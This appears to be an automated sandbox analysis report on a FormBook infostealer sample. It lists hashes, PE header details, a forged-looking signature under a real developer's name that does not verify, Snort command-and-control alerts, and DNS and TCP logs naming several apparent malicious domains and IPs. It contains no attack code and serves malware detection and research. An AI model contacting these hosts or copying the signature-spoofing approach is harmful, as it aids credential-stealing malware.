                                                                                                                  Process:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):7.786493335198377
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:duGqHKp0OUXaX1D.exe
                                                                                                                  File size:841'224 bytes
                                                                                                                  MD5:e2eda8c49ab184de6d3b030bd499e4d1
                                                                                                                  SHA1:2747c8421270d9630708f343b98fb2012dc38003
                                                                                                                  SHA256:d68a5d440931df383de62e3436f5f485ecd75b552e8b78065706a8c880828378
                                                                                                                  SHA512:ce66aadb5249daf082847be1209f05b2b40fc0b645b38dd4661dca903b75065c5ef3f9872340c7795c6aa1dc987608c963181753e88c38f5b76bfb3193033e99
                                                                                                                  SSDEEP:12288:jQAqsJTENl3zRaMrOQ9aMG8fwarcbNJC//a9SvW09a9f7bkWb1eVY20egIJFW9dO:kAPxENlFaMrvEkYarcJJs/amBQN16Yzi
                                                                                                                  TLSH:B9052201BAC9A755D76447F322FA90118BB12E872470D50E6C9073CF4A37FC5ABA2B5B
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>................0.................. ........@.. ....................................@................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4cb392
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x8E073EEC [Wed Jul 5 03:52:12 2045 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xcb33e0x4f.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x694.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xca0000x3608
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xc9bc00x70.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000xc93980xc940052247b017ba50f32aa509f2016ff73faFalse0.9040312014751553data7.791946698624655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xcc0000x6940x800f62932b8cf7f57ede335ff7747011d69False0.3662109375data3.6315500749990233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xce0000xc0x2003603d43950f548641bee4d0fab78e8a2False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_VERSION0xcc0900x404data0.4270428015564202
                                                                                                                  RT_MANIFEST0xcc4a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  03/18/24-14:45:15.449269TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.8208.91.197.27
                                                                                                                  03/18/24-14:42:31.107731TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.8172.67.146.200
                                                                                                                  03/18/24-14:44:13.611801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.8192.0.78.25
                                                                                                                  03/18/24-14:41:50.896878TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.8104.21.23.10
                                                                                                                  03/18/24-14:43:52.963321TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.8216.40.34.41
                                                                                                                  03/18/24-14:42:51.242337TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.8172.67.160.57
                                                                                                                  03/18/24-14:44:34.116378TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.815.197.142.173
                                                                                                                  03/18/24-14:43:11.686520TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.8172.67.171.253

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 18, 2024 14:41:50.809467077 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.896608114 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.896790981 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.896878004 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.984004974 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997144938 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997172117 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997219086 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997222900 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.997288942 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997303963 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997334003 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.997406960 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:50.997627974 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:41:50.997709036 CET4971180192.168.2.8104.21.23.10
                                                                                                                  Mar 18, 2024 14:41:51.085737944 CET8049711104.21.23.10192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:31.019795895 CET4971380192.168.2.8172.67.146.200
                                                                                                                  Mar 18, 2024 14:42:31.107516050 CET8049713172.67.146.200192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:31.107624054 CET4971380192.168.2.8172.67.146.200
                                                                                                                  Mar 18, 2024 14:42:31.107731104 CET4971380192.168.2.8172.67.146.200
                                                                                                                  Mar 18, 2024 14:42:31.195461035 CET8049713172.67.146.200192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:31.208311081 CET8049713172.67.146.200192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:31.208451986 CET4971380192.168.2.8172.67.146.200
                                                                                                                  Mar 18, 2024 14:42:31.208652020 CET8049713172.67.146.200192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:31.208709002 CET4971380192.168.2.8172.67.146.200
                                                                                                                  Mar 18, 2024 14:42:31.296150923 CET8049713172.67.146.200192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:51.154351950 CET4971480192.168.2.8172.67.160.57
                                                                                                                  Mar 18, 2024 14:42:51.242155075 CET8049714172.67.160.57192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:51.242229939 CET4971480192.168.2.8172.67.160.57
                                                                                                                  Mar 18, 2024 14:42:51.242336988 CET4971480192.168.2.8172.67.160.57
                                                                                                                  Mar 18, 2024 14:42:51.329956055 CET8049714172.67.160.57192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:51.746530056 CET4971480192.168.2.8172.67.160.57
                                                                                                                  Mar 18, 2024 14:42:51.834742069 CET8049714172.67.160.57192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:51.834814072 CET4971480192.168.2.8172.67.160.57
                                                                                                                  Mar 18, 2024 14:43:11.597857952 CET4971580192.168.2.8172.67.171.253
                                                                                                                  Mar 18, 2024 14:43:11.686316967 CET8049715172.67.171.253192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.686445951 CET4971580192.168.2.8172.67.171.253
                                                                                                                  Mar 18, 2024 14:43:11.686520100 CET4971580192.168.2.8172.67.171.253
                                                                                                                  Mar 18, 2024 14:43:11.773705959 CET8049715172.67.171.253192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.790338039 CET8049715172.67.171.253192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.790496111 CET8049715172.67.171.253192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.790618896 CET4971580192.168.2.8172.67.171.253
                                                                                                                  Mar 18, 2024 14:43:11.790618896 CET4971580192.168.2.8172.67.171.253
                                                                                                                  Mar 18, 2024 14:43:11.877935886 CET8049715172.67.171.253192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:52.855199099 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:52.963165998 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:52.963247061 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:52.963320971 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081453085 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081484079 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081496000 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081510067 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081523895 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081536055 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081562042 CET8049716216.40.34.41192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:53.081607103 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081648111 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:43:53.081706047 CET4971680192.168.2.8216.40.34.41
                                                                                                                  Mar 18, 2024 14:44:13.524069071 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.611567020 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.611675024 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.611800909 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.699366093 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699393034 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699453115 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.699532032 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.699595928 CET4971780192.168.2.8192.0.78.25
                                                                                                                  Mar 18, 2024 14:44:13.787108898 CET8049717192.0.78.25192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.020958900 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.116192102 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.116378069 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.116378069 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.211232901 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211697102 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211710930 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:34.211813927 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.211972952 CET4971880192.168.2.815.197.142.173
                                                                                                                  Mar 18, 2024 14:44:34.306912899 CET804971815.197.142.173192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.360694885 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.449059963 CET8049719208.91.197.27192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.449131966 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.449269056 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:15.542612076 CET8049719208.91.197.27192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.934104919 CET4971980192.168.2.8208.91.197.27
                                                                                                                  Mar 18, 2024 14:45:16.123462915 CET8049719208.91.197.27192.168.2.8

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 18, 2024 14:41:50.701340914 CET6015953192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:41:50.808120966 CET53601591.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:11.153680086 CET6543553192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:11.277554035 CET53654351.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:30.856548071 CET6306453192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:31.018799067 CET53630641.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:42:50.856646061 CET5496853192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:42:50.993315935 CET53549681.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:11.497210026 CET5086053192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:11.596894026 CET53508601.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:32.263359070 CET6550653192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:32.354054928 CET53655061.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:43:52.676126957 CET5208153192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:43:52.854268074 CET53520811.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:13.356667995 CET6275153192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:13.523046017 CET53627511.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:33.841057062 CET6421253192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:34.015443087 CET53642121.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:44:54.434861898 CET5113753192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:44:54.529388905 CET53511371.1.1.1192.168.2.8
                                                                                                                  Mar 18, 2024 14:45:15.186395884 CET5223453192.168.2.81.1.1.1
                                                                                                                  Mar 18, 2024 14:45:15.359544039 CET53522341.1.1.1192.168.2.8

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Mar 18, 2024 14:41:50.701340914 CET192.168.2.81.1.1.10x19dfStandard query (0)www.agathis.funA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:11.153680086 CET192.168.2.81.1.1.10x616aStandard query (0)www.grupooceanique.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:30.856548071 CET192.168.2.81.1.1.10xabb1Standard query (0)www.repair-services.todayA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:50.856646061 CET192.168.2.81.1.1.10x2093Standard query (0)www.taiyuanbaoyang.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:11.497210026 CET192.168.2.81.1.1.10x72aStandard query (0)www.beatricesswarthout.xyzA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:32.263359070 CET192.168.2.81.1.1.10xa10dStandard query (0)www.engagenotrage.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:52.676126957 CET192.168.2.81.1.1.10x1efdStandard query (0)www.velvetgloveseasonings.storeA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:13.356667995 CET192.168.2.81.1.1.10x6d6bStandard query (0)www.gildedbeautyaesthitics.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:33.841057062 CET192.168.2.81.1.1.10x108cStandard query (0)www.maxhealthunity.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:54.434861898 CET192.168.2.81.1.1.10x535bStandard query (0)www.fonbnk.proA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:45:15.186395884 CET192.168.2.81.1.1.10x93c1Standard query (0)www.scheuermannworks.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Mar 18, 2024 14:41:50.808120966 CET1.1.1.1192.168.2.80x19dfNo error (0)www.agathis.fun104.21.23.10A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:41:50.808120966 CET1.1.1.1192.168.2.80x19dfNo error (0)www.agathis.fun172.67.208.68A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:11.277554035 CET1.1.1.1192.168.2.80x616aName error (3)www.grupooceanique.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:31.018799067 CET1.1.1.1192.168.2.80xabb1No error (0)www.repair-services.today172.67.146.200A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:31.018799067 CET1.1.1.1192.168.2.80xabb1No error (0)www.repair-services.today104.21.39.169A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:50.993315935 CET1.1.1.1192.168.2.80x2093No error (0)www.taiyuanbaoyang.com172.67.160.57A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:42:50.993315935 CET1.1.1.1192.168.2.80x2093No error (0)www.taiyuanbaoyang.com104.21.90.194A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:11.596894026 CET1.1.1.1192.168.2.80x72aNo error (0)www.beatricesswarthout.xyz172.67.171.253A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:11.596894026 CET1.1.1.1192.168.2.80x72aNo error (0)www.beatricesswarthout.xyz104.21.88.28A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:32.354054928 CET1.1.1.1192.168.2.80xa10dName error (3)www.engagenotrage.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:43:52.854268074 CET1.1.1.1192.168.2.80x1efdNo error (0)www.velvetgloveseasonings.store216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:13.523046017 CET1.1.1.1192.168.2.80x6d6bNo error (0)www.gildedbeautyaesthitics.comgildedbeautyaesthitics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:13.523046017 CET1.1.1.1192.168.2.80x6d6bNo error (0)gildedbeautyaesthitics.com192.0.78.25A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:13.523046017 CET1.1.1.1192.168.2.80x6d6bNo error (0)gildedbeautyaesthitics.com192.0.78.24A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:34.015443087 CET1.1.1.1192.168.2.80x108cNo error (0)www.maxhealthunity.commaxhealthunity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:34.015443087 CET1.1.1.1192.168.2.80x108cNo error (0)maxhealthunity.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:34.015443087 CET1.1.1.1192.168.2.80x108cNo error (0)maxhealthunity.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:44:54.529388905 CET1.1.1.1192.168.2.80x535bName error (3)www.fonbnk.prononenoneA (IP address)IN (0x0001)false
                                                                                                                  Mar 18, 2024 14:45:15.359544039 CET1.1.1.1192.168.2.80x93c1No error (0)www.scheuermannworks.com208.91.197.27A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.agathis.fun
                                                                                                                  • www.repair-services.today
                                                                                                                  • www.taiyuanbaoyang.com
                                                                                                                  • www.beatricesswarthout.xyz
                                                                                                                  • www.velvetgloveseasonings.store
                                                                                                                  • www.gildedbeautyaesthitics.com
                                                                                                                  • www.maxhealthunity.com
                                                                                                                  • www.scheuermannworks.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
